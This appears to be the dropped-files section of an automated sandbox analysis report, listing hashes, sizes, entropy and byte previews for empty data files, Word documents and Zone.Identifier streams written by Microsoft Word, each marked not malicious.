                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:data
                            Category:dropped
                            Size (bytes):512
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:BF619EAC0CDF3F68D496EA9344137E8B
                            SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                            SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                            SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                            Malicious:false
                            Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115513
                            Entropy (8bit):7.946049477591214
                            Encrypted:false
                            SSDEEP:3072:JIb59dgsol8gxwo+uc8nYQuTUjgcOiWu+qnKuBR0V52z:Sasol7xGL8nN2unOi3NWUz
                            MD5:C9DFFBFBD3D2584B2F232BDD612213BF
                            SHA1:92B5D4C84BFE1A0EE40F66EE250C523AC8E1216B
                            SHA-256:CC7507B1E5E3F2CF16DC2BEA922125C2E34A8499CD2EFF3661483AEE5735E3F2
                            SHA-512:8F38A5E0179299D03F14C4305912D41F1FDE4F02DD446EBB491F0EFAC18B08905AAB6799B6D98BA75AD8F9DF43F1171C341B9A35A628B6F6A3F79FCE47CEDF93
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198330
                            Entropy (8bit):7.957768327937359
                            Encrypted:false
                            SSDEEP:6144:SSbRvzstwt+tixYGhbOqJG39i0En8JNO7MO:SosD2hb74En8JNEMO
                            MD5:FD377D487D7FAA8D47BEF850F3C150B7
                            SHA1:84BD32E420FB1F04717C03DC07F2B2F07CB88573
                            SHA-256:2569EE4448907487E65D2E6722A092DC8064E061B9F19D8927F466C205C38EFF
                            SHA-512:201B4C48409DEDDCDB30AF25393EF8429A272A40B62A561A2D362609FC0B5B5CE8ADFBFDF2DA7810BF3A7877ADE2EF62D0766CF54F42C4FACAA38148954F8490
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115520
                            Entropy (8bit):7.944125560202463
                            Encrypted:false
                            SSDEEP:3072:JIbZ8j0fXGdVWbOC4S7fpP8OLNnYQDTiu9THrEydvqBEBD2P:SVfAVWbDfpFLNnN3f9THrEMqqB6P
                            MD5:05BA7D1F469C3645DCC4D4F4A99FD547
                            SHA1:607E1A69523B5EA5CC2D54AE90A8FBFCA6BFB1FC
                            SHA-256:A07901EBF0C6D0DFFE99F21F24576116874583A9A3B7C7EB24F74F4ED1E6B376
                            SHA-512:314A80F850C47322D1767896BC4B544108DFE5B7AE74C0DB416F6736A0C87079DFC2A951EC135360EF02EF95EE36F327C26061B5DF6606EF947946049077887C
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198331
                            Entropy (8bit):7.95801234334865
                            Encrypted:false
                            SSDEEP:3072:JIbRlHXhVuBHT1wsnllwmsj3DUiXyKMMIDlGh35SGe6TrukAcaYs/s6Bx0g:SRlHRQBHJW3E2IDldmjax/jP9
                            MD5:DFB6D784E7A1CA6FBDD5FD01C47545A4
                            SHA1:E592FD9A9CEC6F57D762C6070A4847F43D648489
                            SHA-256:493B4ACFE0FED024843B240E0D6C715B5AE670DDD53A092A47CA556D5CCF19EC
                            SHA-512:5033F1227EB743E48FAC52795F44788E02FE04FE8E7B6B2C26A64200389E3FABC632D0D55B09D6D603D8650E69D81DDA7339C5B785285CAFFAF829B607BE7C05
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115513
                            Entropy (8bit):7.9448847476730515
                            Encrypted:false
                            SSDEEP:3072:JIb9AcpOobJUYqpdKYmkwnCMZOEdmDH6g9GB12C:S9HUMJUPpzmkAEDHlQ2C
                            MD5:E6AAD9F6B4319EE34DB7A09D4CA411D5
                            SHA1:7AAC00593BE86BF7F63D0C4A48DD986485420608
                            SHA-256:0004796C87544CAD2C9DE7BCAD6680EE4C4F1E495DD53C8445E4078F90DAEF88
                            SHA-512:1D5C08094061E877AD62AA4D32E96375682AC2F51382E5707F5907A1DA1FFFF592323AFDF7588A5078E8B2F195D34FA8916292CA9A70853DE1B991C4296DB647
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115509
                            Entropy (8bit):7.945588843961352
                            Encrypted:false
                            SSDEEP:3072:JIbUx2Xwgsol8gxwo+uc8nYQuTUjgcOiWu+uRBaY:Sm2Xpsol7xGL8nN2unOivRR
                            MD5:682F2A2EC685B9A1493B7917AC7B90E6
                            SHA1:12D8E0CD211E0DFE7B2402E63C16005283C3685D
                            SHA-256:FEDEFDEF8BBCA4A6E6B67B25151380E39FE50345AD8933C6AE25385B29080F64
                            SHA-512:EF13C06594EDD52D4EFFDE9FD47D81C03C421020DB06B400BF80EC453991FE9EA20F4CD92A58FFAF54A76E797E3BE69CFE03DF2B297A2281763FEFB3E3D3D2FD
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115514
                            Entropy (8bit):7.945186349112578
                            Encrypted:false
                            SSDEEP:3072:JIbfVR16btlwmbOC4S7fpSn8QizY4Xl8wcz9bWiB52h:ST1EtlwmbDfps8NMtwczlih
                            MD5:9438EE77182F9E525F10D48AE295EF78
                            SHA1:2A9DB85A7EDABD290AD5ED9668D8A6DDDF09A47B
                            SHA-256:1E0DB63AD922BCB38F43DE64590353B878B97A6A007A03E003A20F353B28F180
                            SHA-512:41FB987885AEE58F37AF3C624C1DEBAB02CCBBA2E1B37EB6F6A1E360D22F275ADDB7D40C9D4D5359981B1C4F5CF9C83FB55618E2ADC06A9794A8DE6502D4D12B
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198752
                            Entropy (8bit):7.958075308916186
                            Encrypted:false
                            SSDEEP:6144:SsEXA4BfZIkfmxAHraF2JG37rHmX1cARJdfyJb:SncOxoucMfyJb
                            MD5:8A0B72B0F4ECFF45B1B6344A6EDD16D9
                            SHA1:A7F16D283F51753B6CF76DFEB7A2DE5178C67826
                            SHA-256:BC3C301AE2C8F375FD84E2131AE9965B2A2362DC638C3940D7D415A09B5E8418
                            SHA-512:832BED77DDB2703A717177E89928C20C02C9152C3D32C3BF5300C093E2BC3271E31DDD34715524B4F8E18C8A608F4C2375E657B326FC4A6362689B3E91D717EE
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):198333
                            Entropy (8bit):7.9575799687811415
                            Encrypted:false
                            SSDEEP:3072:JIbVBAlHXhVuBHT1wsnllwmsj3DUiXyKMMIDlGh35SGe6TrukAcaYs/u6tBRD:SolHRQBHJW3E2IDldmjax/u6t3
                            MD5:A3B332B4D170C69BBF05F7760B3A8290
                            SHA1:3A92A1F3FFE30E9579EE21C39942D05A740D1302
                            SHA-256:92D9445D8A59A69E3288C1BA34205C3D51B194A3D8D1579D34B733C8DA7BF8F7
                            SHA-512:8EB5FFE0151B19628D400ABE3A920A10A24EA89CFF85D4FB38D448A88840AC415FBD09C567926EFE76ED5769E7025CFAE311C5FF799828A5C28A76DD2F85CDA7
                            Malicious:false
                            Preview:PK..........!.........2.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-J\X ....e.H...8...?dO..{&M....&R2s..X3.x6u......8.F"A.\.."....L$...P;...`.....|.1&..1.K"..eTK4.3..r.r...kXH....(OF.S..%..R.....+X...s...V$.m_c.......rm....U.V..........),`..h.#.].....>.q.........9.]br....p.|r...S+..l?....d...nf......k.n|\S ..Y..$.)0.................8Sg=z0D.M......a{$b............o..A*..77..c.....;....sl1.,..w.......~.;.:.=...o]..._..J+...[n7.........PK..........!.........N.......
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):26
                            Entropy (8bit):3.95006375643621
                            Encrypted:false
                            SSDEEP:3:ggPYV:rPYV
                            MD5:187F488E27DB4AF347237FE461A079AD
                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                            Malicious:false
                            Preview:[ZoneTransfer]....ZoneId=0
                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                            File Type:Microsoft Word 2007+
                            Category:dropped
                            Size (bytes):115518
                            Entropy (8bit):7.94482109163862
                            Encrypted:false
                            SSDEEP:3072:JIb7evxPBClfUmRafRJvVX7PSirfaCzBp2J:S7evlBClfUmQvVLPSirfaquJ
                            MD5:053FFE2E040DCADD59312CB7E1AD98A4
                            SHA1:68809628C892CCBB148D443B3015F2DCD89F849B
                            SHA-256:DE9561E1D0300DA2B88E714E5D7FFF9C5FF2F9587ECB89C1D5FDA0A516F2A7BC
                            SHA-512:ED803160556840B58C5E06FCE4D99BF8F26BB0476295969B8342AEE5B142A919489A31C4E0B4DCA20294ACDB1DAF31FC38081B99020C5B80694E461FB6B089BB
